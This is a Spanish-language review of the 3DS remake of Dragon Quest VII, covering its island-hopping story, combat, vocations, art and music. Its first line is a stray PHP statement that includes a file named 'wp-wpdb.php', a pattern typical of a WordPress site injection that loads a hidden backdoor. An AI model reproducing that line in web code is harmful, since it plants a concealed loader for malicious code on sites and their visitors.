if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Dragon Quest VII para 3DS – La Fortaleza de LeChuck

Análisis Dragon Quest VII para 3DS

Nintendo 3DS es una consola estupenda para jugar JRPGs y en su catálogo existen títulos para todos los gustos dentro de este género. Uno de los últimos que nos han llegado es el remake de Dragon Quest VII, la séptima entrega de una serie extremadamente popular en Japón desde sus inicios, pero que en occidente tuvo muy poca visibilidad hasta prácticamente su llegada a PlayStation. Dragon Quest VII nunca aterrizó en Europa y gracias a este estupendo remake podremos disfrutar de uno de los mejores de la saga.

Dragon Quest VII

El pasado 27 de mayo, Dragon Quest cumplió 30 años en Japón, y allí se conmemoró el aniversario con numerosos homenajes. Por occidente, no es tan popular, pero gracias a la localización de los últimos títulos, muchos jugadores están cogiendo cariño a esta saga originaria de Enix, creada por Yuji Horii, con la ayuda de Koichi Sugiyama en la maravillosa banda sonora, y Akira Toriyama dándole forma al arte con sus familiares dibujos. A pesar de los años, Dragon Quest continúa en buena forma y por 2017 desembarcará Dragon Quest XI. Mientras tanto, para hacer más corta la espera, tenemos este remake llamado Dragon Quest VII: Fragmentos de un mundo olvidado.

De isla en isla

Dragon Quest VII cuenta la historia de tres amigos que viven en una pequeña isla, la única porción de tierra que existe en el mundo, o eso dicen los adultos. El trío formado por nuestro personaje, el príncipe Kiefer y Mariel, no lo cree así y rastrea toda la isla, incluidas las zonas prohibidas, en busca de pistas hasta que descubren un barco oculto en una gruta y deciden hacerse a la mar para ver qué hay más allá del horizonte. Durante su exploración, también dan con un templo olvidado que está protegido por un ser que los anima a buscar fragmentos de tablillas con el propósito de desbloquear islas del pasado. Así comienza el viaje del grupo que les llevará por islas pintorescas y peligros desconocidos.

Dragon Quest VII
Nuestros tres protagonistas

El juego ofrece un inicio tranquilo, dejando al jugador que se familiarice con el entorno y explore sin preocupaciones. Después de un rato, podremos adentrarnos en islas por medio de unos fragmentos de tablillas esparcidos por todo el mundo. El juego está totalmente construido para que disfrutemos haciendo lo que queramos y, para no despistarse, en el menú tenemos el apartado llamado «Info«, el cual se divide en «Acontecimientos Recientes», donde se nos relata nuestros objetivos a corto plazo; «Hasta Ahora», para conocer nuestras hazañas y misiones resueltas en cada isla y otros relacionados con la ubicación e información de las tablillas. Para obtener más información, podremos presionar B, y así nuestros compañeros harán comentarios de los últimos hechos importantes o indicaciones para resolver una misión, lo mismo ocurrirá si hablamos con los habitantes de las islas. Escuchar la opinión de los habitantes de los pueblos después de las misiones es realmente divertido y continuamente revisitaba los lugares para leer sus comentarios. Además, el juego tiene muchas curiosidades y humor para hacernos pasar buenos ratos.

Dragon Quest VII
Nueva isla, nuevos misterios

Un mundo a nuestra disposición

El mundo abierto de Dragon Quest VII, marca de la casa, está presente en esta entrega, haciendo que podamos recorrer el mapa de arriba a abajo y descubrir la mayor parte de áreas a pie o en barco, por lo tanto, gozaremos de una gran libertad de movimiento. A lo largo de la aventura, iremos recogiendo fragmentos de tablillas que completan unos rompecabezas que nos permitirán viajar a islas del pasado a través de portales y revisitarlas en el presente con nuestro barco. El jugador podrá elegir qué isla desbloquear para así vivir una nueva historia y misterios. Cada isla sufre una contrariedad que amenaza la paz de los habitantes y el grupo tendrá que hacerse cargo para traer la felicitad al presente. Los problemas que acontecen a los pobladores de estas regiones son muy variados, igual que sus costumbres y acentos (os partiréis de risa con esto), mostrándonos una gran variedad de historias que nos harán disfrutar como un enano, y a la vez logrando que el título se desmarque de otros RPGs más centrados en avanzar en una línea argumental concreta.

La mayor parte del recorrido por las sendas de Dragon Quest es pausado y con mazmorras que no nos darán demasiados dolores de cabeza. También es importante destacar el hecho de que no estaremos obligados a recorrer grandes distancias si no lo deseamos, ya que hay hechizos que harán que salgamos de una mazmorra o lleguemos a una isla de forma instantánea. Así que el juego se adapta también a la forma de jugar del usuario.

Dragon Quest VII

Sistema de combate

El remake de Dragon Quest VII para 3DS ha experimentado cambios en el sistema de combate para adaptarlo a los nuevos tiempos. Para empezar, se elimina la vista en primera persona -la cual estuvo presente hasta Dragon Quest VII de PlayStation- por la tercera en el combate, sin embargo, el cambio más significativo es el abandono de los encuentros aleatorios (Dragon Quest VIII de Playstation 2 fue último en tener esta característica) para pasar a mostrar los enemigos en pantalla y así dar la elección al jugador de esquivar o enfrentarse a ellos, eso si no nos ven antes y se lanzan hacia nosotros, claro. Sin embargo, no han querido perder totalmente sus raíces y en las travesías marinas se conservan los combates aleatorios, así que cuando estemos con nuestro barco surcando los mares la acción se parará y tendremos que hacer frente a algún monstruo.

El sistema por turnos se mantiene en Dragon Quest VII fiel a sus inicios y los comandos Atacar, Defender, Magia, Objeto, Huir, entre otros, se conservan. Me resultó especialmente útil la «Táctica» para hacer que los miembros de mi grupo fueran autónomos, ya que dentro de dicha opción se puede elegir entre varias funciones como «no usar magia», «lucha prudente», etc. para adaptar el combate a nuestras necesidades. También podremos escoger la táctica y formación fuera de un combate en el apartado «Misc.» del menú.

Dragon Quest VII Combate por turnos

Nuestro grupo estará formado por un máximo de cuatro personajes, pero hay otros que se unirán momentáneamente. Éstos son simplemente NPCs que forman parte de la trama y arrimarán el hombro en los combates; los otros nos acompañarán en nuestra aventura y serán parte activa del juego. Tanto unos como otros serán visibles en todo momento y nos seguirán allá donde vayamos.

Cuando avancemos en la historia, el jugador podrá elegir su vocación (lo que sería el trabajo o clase) entre más de 30 disponibles. Dependiendo de la vocación, el personaje puede aumentar los atributos y aprender nuevos hechizos y habilidades. También cambiará su apariencia. La elección de un trabajo puede cambiar drásticamente la dinámica del grupo en batalla, por lo que es aconsejable probar diferentes combinaciones para obtener ventajas concretas. Para mejorar los trabajos existen unos objetos llamados «corazón de monstruo», que se consiguen en cofres y al vencer monstruos, y con este objeto los personajes aprenderán una «vocación de monstruo», la cual enseña al personaje las habilidades del bicho y le «disfraza» de él.

Dragon Quest VII Trabajos
Habrán un montón de trabajos que podrán evolucionar en otros tantos

También será interesante invertir nuestras monedas en mejor equipamiento. En las armerías de las islas que vayamos desbloqueando, encontraremos equipo de mayor nivel para cada uno de nuestros miembros. No obstante, con cada combate nuestro grupo subirá de nivel y aprenderá habilidades, la combinación de nuestras armas y habilidades especiales inclinarán la balanza. Asimismo, es conveniente comprar objetos de vida y antídotos para no lamentar consecuencias contra un jefe.

Arte encantador, banda sonora soberbia

Para los que como yo alucinaban, y alucinan aún, con Dragon Ball, seguro que el arte de Toriyama no les deja indiferente. El diseño de Toriyama es único, dejando su seña de identidad en todo lo que hace. El juego potencia este aspecto ofreciendo planos cercanos en los momentos cruciales de la historia para que podamos apreciar más detenidamente el diseño de los curiosos personajes que habitan este mundo. También son muy resultonas las animaciones y bastante más trabajadas que en otros RPGs de la consola. Bueno, y de la banda sonora, ¿qué os puedo contar? Sugiyama-sama es un genio, creando auténticos himnos que suenan en cada entrega y hasta en la serie de animación, haciendo que los tarareemos hasta la saciedad. Sugiyama fue un precursor y grandes compositores y compositoras como Yoko Shimomura (Street Fighter II, Kingdom Hearts, FF XV…) aprendieron de él. Este remake de Dragon Quest VII incorpora temas midi con otros orquestados, y realmente todos suenan genial.

Dragon Quest VII Toriyama
Toriyama ilustra cada Dragon Quest

Visualmente, el remake de Dragon Quest VII ha sufrido un intenso lavado de cara, ahora se ve más de nuestro tiempo e incluye cambios para hacer más accesible la experiencia. Estas son las diferencias más destacadas respecto a la versión de Playstation:

• Introducido un radar en la interfaz para encontrar más fácilmente los fragmentos de tablillas. Además, se ha añadido un personaje para dar consejos en la búsqueda.
  • Opciones multijugador. Podremos intercambiar tablillas de viajero online o a través de StreetPass con otros jugadores para acceder a nuevas mazmorras.
  • Un personaje cambia de apariencia después de escoger un trabajo. También suben más rápido los niveles de profesión y están más equilibrados y simplificados.
  • Algunas localizaciones y personajes han sufrido alguna modificación en su nombre. Por ejemplo, Kiefer es ahora el Príncipe Kiefer.
  • Nuevos dialectos.
  • Nuevo apartado gráfico. Echad un ojo:

Dragon Quest VII: Fragmentos de un Mundo Olvidado fue un juego hecho con mucho mimo y este remake mejora multitud de aspectos para hacerlo más accesible y disfrutable para todo el mundo. Tiene un buen puñado de horas de juego e historias en el pasado y presente que harán despegar nuestra imaginación y nos sentiremos como un verdadero héroe ayudando a las gentes del nuevo mundo. Dragon Quest VII es un juego enorme, ideal para adentrarse en la saga y un imprescindible para 3DS.